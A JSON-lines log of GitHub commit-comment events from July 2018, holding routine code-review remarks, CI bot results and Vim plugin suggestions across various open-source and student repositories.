{"id":"7926407242","type":"CommitCommentEvent","actor":{"login":"fk"},"repo":{"name":"gatsbyjs/gatsby"},"payload":{"comment":{"id":29615773,"position":279,"line":198,"path":"www/src/data/sidebars/doc-links.yaml","commit_id":"ba55b66e169a16bfb3333658ad804b7ef0d3d197","created_at":"2018-07-06T01:55:56Z","updated_at":"2018-07-06T01:55:56Z","author_association":"CONTRIBUTOR","body":"Change `link` to `title`."}},"created_at":"2018-07-06T01:55:56Z"}
{"id":"7926407280","type":"CommitCommentEvent","actor":{"login":"gustavovalverde"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29615774,"position":null,"line":null,"path":null,"commit_id":"896e3f4c1eace0c1ad3e3b472fa373e62d7cddb5","created_at":"2018-07-06T01:55:57Z","updated_at":"2018-07-06T01:55:57Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-06T01:55:57Z"}
{"id":"7926410662","type":"CommitCommentEvent","actor":{"login":"nuwang"},"repo":{"name":"CloudVE/cloudbridge"},"payload":{"comment":{"id":29615781,"position":7,"line":833,"path":"cloudbridge/cloud/providers/aws/resources.py","commit_id":"eb997c0b37483170e3dd6626422b831980669064","created_at":"2018-07-06T01:57:15Z","updated_at":"2018-07-06T01:57:15Z","author_association":"CONTRIBUTOR","body":"@afgane This will result in a scaling issue. A 1000 keys would results in a 1000 http gets, which would scale very badly to larger container sizes - especially in the millions. I think we could handle this at the resource level instead - possibly a conditional (if is instance ObjectSummary and if isinstance Object. We should also have a test for this."}},"created_at":"2018-07-06T01:57:15Z"}
{"id":"7926410738","type":"CommitCommentEvent","actor":{"login":"patryckpo"},"repo":{"name":"patryckpo/ptb"},"payload":{"comment":{"id":29615782,"position":null,"line":null,"path":null,"commit_id":"6ccbc5a49d24f10ef4f4bfb1fd2c2aa0e1abcc09","created_at":"2018-07-06T01:57:16Z","updated_at":"2018-07-06T01:57:16Z","author_association":"OWNER","body":"No caso a ROM citada acima é a [b1], com 32KB.\r\nEsta tradução também pode ser aplicada nas ROMs seguintes:\r\nCongo Bongo (J) (SG-1000) (V1.0) [b2].sg (CRC32: B09E2E6D)\r\nCongo Bongo (J) (SG-1000) (V1.1) (40K).sg (CRC32: F1506565)\r\nCongo Bongo (J) (SG-1000) (V1.1).sg (CRC32: 5A24C7CF)\r\nCongo Bongo (T) (SG-1000) (V1.1) [b1].sg (CRC32: F7EB94C5)"}},"created_at":"2018-07-06T01:57:16Z"}
{"id":"7926413933","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29615785,"position":null,"line":null,"path":null,"commit_id":"a04ec2011faca30079d1cec3d5a49c590e451f04","created_at":"2018-07-06T01:58:33Z","updated_at":"2018-07-06T01:58:33Z","author_association":"CONTRIBUTOR","body":"@ryanbr popads new domain `2ddl.ws`"}},"created_at":"2018-07-06T01:58:33Z"}
{"id":"7926415296","type":"CommitCommentEvent","actor":{"login":"yuvipanda"},"repo":{"name":"znicholls/the-littlest-jupyterhub"},"payload":{"comment":{"id":29615786,"position":26,"line":27,"path":"tljh/jupyterhub_config.py","commit_id":"3c771b6be58baaf86ada71f04c3a5f35e8c0d831","created_at":"2018-07-06T01:59:06Z","updated_at":"2018-07-06T01:59:06Z","author_association":"NONE","body":"https://github.com/data-8/nbgitpuller might be of use here :)"}},"created_at":"2018-07-06T01:59:06Z"}
{"id":"7928009394","type":"CommitCommentEvent","actor":{"login":"Toflar"},"repo":{"name":"terminal42/contao-url-rewrite"},"payload":{"comment":{"id":29619190,"position":7,"line":81,"path":"src/Resources/contao/dca/tl_url_rewrite.php","commit_id":"d05fc0e5ecaa43dfdf2f5ea9d66380776990d127","created_at":"2018-07-06T10:00:54Z","updated_at":"2018-07-06T10:00:54Z","author_association":"MEMBER","body":"Do we trigger the onsubmit callback or how are the files regenerated?"}},"created_at":"2018-07-06T10:00:54Z"}
{"id":"7928012761","type":"CommitCommentEvent","actor":{"login":"sberyozkin"},"repo":{"name":"thorntail/thorntail"},"payload":{"comment":{"id":29619196,"position":null,"line":null,"path":null,"commit_id":"65c625935d80e7e9657195cff7dacf450ec738e6","created_at":"2018-07-06T10:01:31Z","updated_at":"2018-07-06T10:01:31Z","author_association":"CONTRIBUTOR","body":"Looks like this has broken the build"}},"created_at":"2018-07-06T10:01:31Z"}
{"id":"7928014185","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"w1th0utnam3/minidolfin"},"payload":{"comment":{"id":29619199,"position":null,"line":null,"path":null,"commit_id":"1cf6086d933ca93f4a36be44b6321fd300f3757f","created_at":"2018-07-06T10:01:49Z","updated_at":"2018-07-06T10:01:49Z","author_association":"NONE","body":"I am not asking to support FFC-old. Problem with this is that pip will pull FFC-old from PyPI with this. That's not gonna work and furthermore FFC-old and FFCx are conflicting Python packages. So it would be better to not require that for now. Maybe it could be:\r\n```"}},"created_at":"2018-07-06T10:01:49Z"}
{"id":"7928020454","type":"CommitCommentEvent","actor":{"login":"B1ggDave"},"repo":{"name":"ktorio/ktorio.github.io"},"payload":{"comment":{"id":29619209,"position":11,"line":11,"path":"servers/configuration/environments.md","commit_id":"d3abbbfeb5b42b2372c5176c28efe7d43f686286","created_at":"2018-07-06T10:03:08Z","updated_at":"2018-07-06T10:03:08Z","author_association":"CONTRIBUTOR","body":"Ktor doesn't impose any way for doing this, here are some guidelines we can suggest, but there are a lot of other options available, some of which may suit your use case better."}},"created_at":"2018-07-06T10:03:08Z"}
{"id":"7928020490","type":"CommitCommentEvent","actor":{"login":"Phahou"},"repo":{"name":"Phahou/unixconv"},"payload":{"comment":{"id":29619210,"position":7,"line":5,"path":"options.c","commit_id":"de1f98f90196a339d4b0be2440bebf57493f33f7","created_at":"2018-07-06T10:03:08Z","updated_at":"2018-07-06T10:03:08Z","author_association":"OWNER","body":"ups"}},"created_at":"2018-07-06T10:03:08Z"}
{"id":"7928023300","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29619217,"position":null,"line":null,"path":null,"commit_id":"827412808f9215aea72a67bc4741a14d4ae13d85","created_at":"2018-07-06T10:03:39Z","updated_at":"2018-07-06T10:03:39Z","author_association":"NONE","body":"Remove `vim-prettier` plugin, ALE already supports fixing the file with current fixers. Do something like [this](https://github.com/kutsan/dotfiles/blob/d0be456bedcf0451973fa8d2f596d1f612091724/.vim/plugin/packages/ale.vim#L34-L44) to get it work.\r\n\r\n```vim\r\nnmap <Leader>e <Plug>(ale_fix)\r\n```\r\n\r\nor just use `:ALEFix`."}},"created_at":"2018-07-06T10:03:39Z"}
{"id":"7928028087","type":"CommitCommentEvent","actor":{"login":"comptetestACL"},"repo":{"name":"InseeFr/Test-Destinie"},"payload":{"comment":{"id":29619229,"position":null,"line":null,"path":null,"commit_id":"051a458fbb944b1ac7df15381392778416d47984","created_at":"2018-07-06T10:04:38Z","updated_at":"2018-07-06T10:04:38Z","author_association":"NONE","body":"je veux faire un commentaire sur ce commit"}},"created_at":"2018-07-06T10:04:38Z"}
{"id":"7928028476","type":"CommitCommentEvent","actor":{"login":"alexandruanghel"},"repo":{"name":"hortonworks/ansible-hortonworks"},"payload":{"comment":{"id":29619232,"position":null,"line":null,"path":null,"commit_id":"4d417373d5fbb1d9c9a1414316603fd57ffa6140","created_at":"2018-07-06T10:04:42Z","updated_at":"2018-07-06T10:04:42Z","author_association":"COLLABORATOR","body":"This originally sounded bizarre as I've tested this quite a bit before pushing and it was working for me.\r\n\r\nIt turns out I'm using a Jinja2 feature that is only available in Jinja2.10: https://github.com/pallets/jinja/commit/c2ee56db0e5e3a5a321285a85550958955b88d02#diff-8f76b794bd641afb7bd92eba51f332f3\r\n\r\nPlease update your Jinja2 to 2.10, this version was released in Nov 2017 :)\r\n"}},"created_at":"2018-07-06T10:04:42Z"}
{"id":"7928028495","type":"CommitCommentEvent","actor":{"login":"prashmeh"},"repo":{"name":"mitmehta/myCcode"},"payload":{"comment":{"id":29619233,"position":null,"line":null,"path":null,"commit_id":"74f1012f9cd887b3d484d5490e7dab96dded1edc","created_at":"2018-07-06T10:04:43Z","updated_at":"2018-07-06T10:04:43Z","author_association":"CONTRIBUTOR","body":"The commit name should be find the 2 repeating numbers."}},"created_at":"2018-07-06T10:04:43Z"}
{"id":"7928029084","type":"CommitCommentEvent","actor":{"login":"brice-morin"},"repo":{"name":"TelluIoT/ThingML"},"payload":{"comment":{"id":29619237,"position":null,"line":null,"path":null,"commit_id":"ef07b24316af795b786a4f489a07b2b4709e886f","created_at":"2018-07-06T10:04:50Z","updated_at":"2018-07-06T10:04:50Z","author_association":"COLLABORATOR","body":":+1: "}},"created_at":"2018-07-06T10:04:50Z"}
{"id":"7928033421","type":"CommitCommentEvent","actor":{"login":"prashmeh"},"repo":{"name":"mitmehta/myCcode"},"payload":{"comment":{"id":29619254,"position":null,"line":null,"path":null,"commit_id":"594a6a0177dc4a85a03cb7ca6696600f46a87ea1","created_at":"2018-07-06T10:05:44Z","updated_at":"2018-07-06T10:05:44Z","author_association":"CONTRIBUTOR","body":"Can you tell me the complexity of this solution??"}},"created_at":"2018-07-06T10:05:44Z"}
{"id":"7928034773","type":"CommitCommentEvent","actor":{"login":"Adolio"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":29619257,"position":7,"line":89,"path":"starling/src/starling/utils/Color.as","commit_id":"0744d514918bd62dce2f99f7b52df1f3601ac888","created_at":"2018-07-06T10:06:01Z","updated_at":"2018-07-06T10:06:01Z","author_association":"NONE","body":"Hey @PrimaryFeather!\r\nIf you (or anyone) are interested, I share the following color transformation methods that I use quite a lot in my projects:\r\n\r\n```\r\n/**\r\n * Convert HSL color to RGB color.\r\n * \r\n * Theory: https://en.wikipedia.org/wiki/HSL_and_HSV\r\n * Implementation & tests: http://www.rapidtables.com/convert/color/hsl-to-rgb.htm\r\n * \r\n * @param h Hue [0, 359]\r\n * @param s Saturation [0, 1.0]\r\n * @param l Lightness [0, 1.0]\r\n * @return RGB color\r\n */\r\npublic static function hslToRgb(h:Number, s:Number, l:Number):uint\r\n\r\n/**\r\n * Convert RGB color to HSL color.\r\n * \r\n * Theory: https://en.wikipedia.org/wiki/HSL_and_HSV\r\n * Implementation & tests: http://www.rapidtables.com/convert/color/rgb-to-hsl.htm\r\n * \r\n * @param rgb Color\r\n * @return hsl output array[3], if null, an array will be instantiate\r\n * @return Array containing [0]=h, [1]=s, [2]=l\r\n */\r\npublic static function rgbToHsl(rgb:uint, hsl:Array=null):Array\r\n\r\n/**\r\n * Convert HSV / HSB color to RGB color.\r\n * \r\n * Theory: https://en.wikipedia.org/wiki/HSL_and_HSV\r\n * Implementation & tests: http://www.rapidtables.com/convert/color/hsv-to-rgb.htm\r\n * \r\n * @param h Hue [0, 359]\r\n * @param s Saturation [0, 1.0]\r\n * @param v Value or Brightness [0, 1.0]\r\n * @return RGB color\r\n */\r\npublic static function hsvToRgb(h:Number, s:Number, v:Number):uint\r\n\r\n/**\r\n * Convert RGB color to HSV color.\r\n * \r\n * Theory: https://en.wikipedia.org/wiki/HSL_and_HSV\r\n * Implementation & tests: http://www.rapidtables.com/convert/color/rgb-to-hsv.htm\r\n * \r\n * @param rgb Color\r\n * @return hsv output array[3], if null, an array will be instantiate\r\n * @return Array containing [0]=h, [1]=s, [2]=v\r\n */\r\npublic static function rgbToHsv(rgb:uint, hsv:Array=null):Array\r\n```\r\nFeel free to ask :)"}},"created_at":"2018-07-06T10:06:01Z"}
{"id":"7928040657","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29619270,"position":28,"line":28,"path":"init.vim","commit_id":"cea110a9d598131c85d7a78a9efbcb048ffe1b6a","created_at":"2018-07-06T10:07:15Z","updated_at":"2018-07-06T10:07:15Z","author_association":"NONE","body":"I suggest you to use [vim-signify](https://github.com/mhinz/vim-signify)    [...](https://github.com/airblade/vim-gitgutter/issues/475)"}},"created_at":"2018-07-06T10:07:15Z"}
{"id":"7928040970","type":"CommitCommentEvent","actor":{"login":"Phahou"},"repo":{"name":"Phahou/unixconv"},"payload":{"comment":{"id":29619273,"position":63,"line":59,"path":"io.c","commit_id":"de1f98f90196a339d4b0be2440bebf57493f33f7","created_at":"2018-07-06T10:07:18Z","updated_at":"2018-07-06T10:07:18Z","author_association":"OWNER","body":"2048 only because if the MUCEasy sends every 5m a message it would only be 1700 lines if the counter has 2 devices to it.\r\nOh only 2 devices hmm.....\r\nmaybe I should add another global #define here or sth like that"}},"created_at":"2018-07-06T10:07:18Z"}
{"id":"7928043795","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29619279,"position":39,"line":39,"path":"init.vim","commit_id":"cea110a9d598131c85d7a78a9efbcb048ffe1b6a","created_at":"2018-07-06T10:07:55Z","updated_at":"2018-07-06T10:07:55Z","author_association":"NONE","body":"Try [vim-polyglot](https://github.com/sheerun/vim-polyglot)."}},"created_at":"2018-07-06T10:07:55Z"}
{"id":"7928049709","type":"CommitCommentEvent","actor":{"login":"shefik"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29619295,"position":4,"line":131,"path":"src/system/ThemeModule/EventListener/DefaultPageAssetSetterListener.php","commit_id":"c97c60a5383fb74024f8ed06e8030b5332c6dfd2","created_at":"2018-07-06T10:09:11Z","updated_at":"2018-07-06T10:09:11Z","author_association":"CONTRIBUTOR","body":"@Guite It would potentially be loaded once per page, if there are different combined assets per page."}},"created_at":"2018-07-06T10:09:11Z"}
{"id":"7928050657","type":"CommitCommentEvent","actor":{"login":"blechta"},"repo":{"name":"blechta/tuc-fenics-recipes"},"payload":{"comment":{"id":29619297,"position":7,"line":5,"path":"build.sh","commit_id":"b2dfe1534b3b2d0b12b16a2451b3f620cd2b8103","created_at":"2018-07-06T10:09:23Z","updated_at":"2018-07-06T10:09:23Z","author_association":"OWNER","body":"This seems buggy. What does it do?"}},"created_at":"2018-07-06T10:09:23Z"}
{"id":"7928057549","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29619317,"position":null,"line":null,"path":null,"commit_id":"e842f9580efe872b8e79a0e19fec5a3e1e253a7a","created_at":"2018-07-06T10:10:54Z","updated_at":"2018-07-06T10:10:54Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-MacOS-10.9-clang: OK (2801 of 2930 tests passed, 42 test warnings)\n\nMessages:\n\n * 104 tests had: EIO diffs.\n * 114 tests had: ESO small diffs.\n * 3 tests had: Table small diffs.\n * 12 tests had: AUD diffs.\n * 157 tests had: BND diffs.\n * 8 tests had: ESO big diffs.\n * 127 tests had: Table big diffs.\n * 151 tests had: MDD diffs.\n * 158 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 100 tests had: MTR small diffs.\n * 3 tests had: MTR big diffs.\n * 2 tests had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 494\n * Failed: 129\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.6%25-yellow.png)</a> \n"}},"created_at":"2018-07-06T10:10:54Z"}
{"id":"7928060602","type":"CommitCommentEvent","actor":{"login":"diegoballen"},"repo":{"name":"diegoballen/MyRepositoryTest1"},"payload":{"comment":{"id":29619322,"position":null,"line":null,"path":null,"commit_id":"f781aad9f288fe855527e68f65f39474c3e3b83c","created_at":"2018-07-06T10:11:34Z","updated_at":"2018-07-06T10:11:34Z","author_association":"OWNER","body":"Branch 1 Change 2"}},"created_at":"2018-07-06T10:11:34Z"}
{"id":"7928064562","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula/core"},"payload":{"comment":{"id":29619330,"position":4,"line":131,"path":"src/system/ThemeModule/EventListener/DefaultPageAssetSetterListener.php","commit_id":"c97c60a5383fb74024f8ed06e8030b5332c6dfd2","created_at":"2018-07-06T10:12:28Z","updated_at":"2018-07-06T10:12:28Z","author_association":"MEMBER","body":"Another possible approach: detect jQuery UI here: https://github.com/zikula/core/blob/2.0/src/system/ThemeModule/Engine/AssetBag.php#L70-L71 and dynamically change (lower) it's weight.\r\n\r\n@craigh @shefik better?"}},"created_at":"2018-07-06T10:12:28Z"}
{"id":"7928067261","type":"CommitCommentEvent","actor":{"login":"roji"},"repo":{"name":"npgsql/npgsql"},"payload":{"comment":{"id":29619337,"position":null,"line":null,"path":null,"commit_id":"7f49d3b27f982bfc1c9ca9dfb544e875d4eff459","created_at":"2018-07-06T10:13:05Z","updated_at":"2018-07-06T10:13:05Z","author_association":"MEMBER","body":"@YohDeadfall unfortunately we have some test flakiness which causes this occasionally... I don't have time to investigate. If you feel like looking into the flakiness please go ahead, otherwise I can also see about giving you access to retrigger travis/appveyor builds."}},"created_at":"2018-07-06T10:13:05Z"}
{"id":"7928067725","type":"CommitCommentEvent","actor":{"login":"NateWr"},"repo":{"name":"bozana/ojs"},"payload":{"comment":{"id":29619339,"position":16,"line":16,"path":"plugins/generic/referenceLinking/locale/en_US/locale.xml","commit_id":"4826a595b0801a6de73904c83812a826b30cbbf9","created_at":"2018-07-06T10:13:11Z","updated_at":"2018-07-06T10:13:11Z","author_association":"NONE","body":"I think it's fine to do this in the background."}},"created_at":"2018-07-06T10:13:11Z"}
{"id":"7928069159","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619344,"position":7,"line":7,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:13:29Z","updated_at":"2018-07-06T10:13:29Z","author_association":"NONE","body":"+ setter, getter, isCheck"}},"created_at":"2018-07-06T10:13:29Z"}
{"id":"7928071275","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29619346,"position":48,"line":105,"path":"init.vim","commit_id":"ab1638300299c904e3b49e92fb9054f9f182bd4e","created_at":"2018-07-06T10:13:58Z","updated_at":"2018-07-06T10:13:58Z","author_association":"NONE","body":"Use `$[[file]]` and `$[[dir]]` modifiers, like:\r\n\r\n```vim\r\nlet g:NERDTreeIgnore = [\r\n\t\\ '^\\.DS_Store$[[file]]',\r\n\t\\ '^\\.git$[[dir]]',\r\n\t\\ '^\\.hg$[[dir]]',\r\n\t\\ '^node_modules$[[dir]]'\r\n\\ ]\r\n```"}},"created_at":"2018-07-06T10:13:58Z"}
{"id":"7928074141","type":"CommitCommentEvent","actor":{"login":"adisky"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29619347,"position":null,"line":null,"path":null,"commit_id":"0167ec76f7d7cc3d3a1a55300fca5721fa2facaa","created_at":"2018-07-06T10:14:37Z","updated_at":"2018-07-06T10:14:37Z","author_association":"NONE","body":"why you commented the code here??"}},"created_at":"2018-07-06T10:14:37Z"}
{"id":"7928074828","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29619349,"position":null,"line":null,"path":null,"commit_id":"21691770ddc54a76376c3176648084fc6621ae5b","created_at":"2018-07-06T10:14:45Z","updated_at":"2018-07-06T10:14:45Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/10/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : java.lang.Exception: Skipping the rest for now\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/10//console)\n"}},"created_at":"2018-07-06T10:14:45Z"}
{"id":"7928075463","type":"CommitCommentEvent","actor":{"login":"kvasilopoulos"},"repo":{"name":"kvasilopoulos/exuber"},"payload":{"comment":{"id":29619351,"position":null,"line":null,"path":null,"commit_id":"f59ec4ed1cd6b59700a77b06329eb29a76b34040","created_at":"2018-07-06T10:14:53Z","updated_at":"2018-07-06T10:14:53Z","author_association":"OWNER","body":"Anyway since we can build and work on windows/linux , we will sort the issue later when we ll need to merge! You can make the changes you wanted on C++ function now if you want."}},"created_at":"2018-07-06T10:14:53Z"}
{"id":"7928076785","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619354,"position":23,"line":23,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:15:10Z","updated_at":"2018-07-06T10:15:10Z","author_association":"NONE","body":"public void scan(char symbol) {\r\n   Scanner in ....\r\n   field[][] = symbol;\r\n   output()\r\n}"}},"created_at":"2018-07-06T10:15:10Z"}
{"id":"7928078733","type":"CommitCommentEvent","actor":{"login":"kutsan"},"repo":{"name":"huyvohcmc/dotfiles"},"payload":{"comment":{"id":29619361,"position":23,"line":29,"path":"init.vim","commit_id":"0d3d653d2d4c29481a6966fb4b51c898d9c9b375","created_at":"2018-07-06T10:15:32Z","updated_at":"2018-07-06T10:15:32Z","author_association":"NONE","body":"I think [gina](https://github.com/lambdalisue/gina.vim) is better, faster and well maintained."}},"created_at":"2018-07-06T10:15:32Z"}
{"id":"7928079016","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619363,"position":23,"line":23,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:15:35Z","updated_at":"2018-07-06T10:15:35Z","author_association":"NONE","body":"scan('x');"}},"created_at":"2018-07-06T10:15:35Z"}
{"id":"7928081079","type":"CommitCommentEvent","actor":{"login":"w1th0utnam3"},"repo":{"name":"w1th0utnam3/minidolfin"},"payload":{"comment":{"id":29619367,"position":null,"line":null,"path":null,"commit_id":"1cf6086d933ca93f4a36be44b6321fd300f3757f","created_at":"2018-07-06T10:16:03Z","updated_at":"2018-07-06T10:16:03Z","author_association":"OWNER","body":"Ah ok, makes sense. I actually didn't use the `setup.py` because I simply added the module to my `PYTHONPATH`. I'll remove it."}},"created_at":"2018-07-06T10:16:03Z"}
{"id":"7928082026","type":"CommitCommentEvent","actor":{"login":"AlexWayfer"},"repo":{"name":"zhiwenhuang/audio-equalizer-chrome"},"payload":{"comment":{"id":29619368,"position":null,"line":null,"path":null,"commit_id":"bb534b5fbec59abe634dce888709f5a7fbd84a89","created_at":"2018-07-06T10:16:15Z","updated_at":"2018-07-06T10:16:15Z","author_association":"NONE","body":"Thank you! :heart: "}},"created_at":"2018-07-06T10:16:15Z"}
{"id":"7928082091","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619369,"position":21,"line":21,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:16:16Z","updated_at":"2018-07-06T10:16:16Z","author_association":"NONE","body":"9 итерации = 18 считываний"}},"created_at":"2018-07-06T10:16:16Z"}
{"id":"7928083129","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619370,"position":21,"line":21,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:16:30Z","updated_at":"2018-07-06T10:16:30Z","author_association":"NONE","body":"5 - итераций"}},"created_at":"2018-07-06T10:16:30Z"}
{"id":"7928084144","type":"CommitCommentEvent","actor":{"login":"jdoubleu"},"repo":{"name":"drud/ddev"},"payload":{"comment":{"id":29619377,"position":5,"line":24,"path":"cmd/ddev/cmd/sequelpro.go","commit_id":"ccedee37bbb2a960b346be5c3a22cabdb17fc5d6","created_at":"2018-07-06T10:16:43Z","updated_at":"2018-07-06T10:16:43Z","author_association":"CONTRIBUTOR","body":"What if, for some reason, the app was installed/saved in lower case?\r\nOr if it was put in another location (e.g. `/Users/john/Applications`)?\r\n\r\nDue to the fact, that you are using the `open` command (see https://github.com/drud/ddev/blob/ccedee37bbb2a960b346be5c3a22cabdb17fc5d6/cmd/ddev/cmd/sequelpro.go#L88), I'd recommend to use the `-a` option:\r\n```\r\nopen -a Sequel\\ Pro\r\n```\r\n\r\nThis way macOS will deal with case-sensitivity and different locations."}},"created_at":"2018-07-06T10:16:43Z"}
{"id":"7928085889","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619381,"position":33,"line":33,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:17:08Z","updated_at":"2018-07-06T10:17:08Z","author_association":"NONE","body":"check делать после 5 хода"}},"created_at":"2018-07-06T10:17:08Z"}
{"id":"7928088882","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619387,"position":4,"line":4,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:17:47Z","updated_at":"2018-07-06T10:17:47Z","author_association":"NONE","body":"checkAll(Battlfield b) {\r\n\r\n}"}},"created_at":"2018-07-06T10:17:47Z"}
{"id":"7928091742","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619393,"position":33,"line":33,"path":"src/game/battlefield.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:18:28Z","updated_at":"2018-07-06T10:18:28Z","author_association":"NONE","body":"c.checkAll(this);\r\nc.checkAll(field);"}},"created_at":"2018-07-06T10:18:28Z"}
{"id":"7928093513","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619396,"position":4,"line":4,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:18:53Z","updated_at":"2018-07-06T10:18:53Z","author_association":"NONE","body":"public boolean checkAll() {\r\n  return true / false;\r\n}"}},"created_at":"2018-07-06T10:18:53Z"}
{"id":"7928095684","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619399,"position":4,"line":4,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:19:23Z","updated_at":"2018-07-06T10:19:23Z","author_association":"NONE","body":"while (checkAll(b)) {\r\n\r\n}"}},"created_at":"2018-07-06T10:19:23Z"}
{"id":"7928096956","type":"CommitCommentEvent","actor":{"login":"adisky"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29619404,"position":6,"line":59,"path":"prow/plugins/plugins.go","commit_id":"0167ec76f7d7cc3d3a1a55300fca5721fa2facaa","created_at":"2018-07-06T10:19:42Z","updated_at":"2018-07-06T10:19:42Z","author_association":"NONE","body":"please add a single line b/w type an func"}},"created_at":"2018-07-06T10:19:42Z"}
{"id":"7928100350","type":"CommitCommentEvent","actor":{"login":"adisky"},"repo":{"name":"rohanand/test-infra"},"payload":{"comment":{"id":29619411,"position":7,"line":47,"path":"prow/plugins/trigger/pr.go","commit_id":"0167ec76f7d7cc3d3a1a55300fca5721fa2facaa","created_at":"2018-07-06T10:20:27Z","updated_at":"2018-07-06T10:20:27Z","author_association":"NONE","body":"why you commented the code here??"}},"created_at":"2018-07-06T10:20:27Z"}
{"id":"7928101260","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619415,"position":14,"line":14,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:20:39Z","updated_at":"2018-07-06T10:20:39Z","author_association":"NONE","body":"z = 3;"}},"created_at":"2018-07-06T10:20:39Z"}
{"id":"7928102313","type":"CommitCommentEvent","actor":{"login":"Raiv1"},"repo":{"name":"Raiv1/Raivgithub."},"payload":{"comment":{"id":29619418,"position":5,"line":26,"path":"Untitled-2.css","commit_id":"0bbac3b84cf2aad2cc58fc76e17b581ec4c96001","created_at":"2018-07-06T10:20:53Z","updated_at":"2018-07-06T10:20:53Z","author_association":"OWNER","body":"kk done"}},"created_at":"2018-07-06T10:20:53Z"}
{"id":"7928102794","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"drag1313/krest_vs_null"},"payload":{"comment":{"id":29619420,"position":20,"line":20,"path":"src/game/check.java","commit_id":"c180b5f747aedbe5f8721b93889228d488602eb2","created_at":"2018-07-06T10:21:00Z","updated_at":"2018-07-06T10:21:00Z","author_association":"NONE","body":"она сквозная  = 4 5 6 7 8 9"}},"created_at":"2018-07-06T10:21:00Z"}
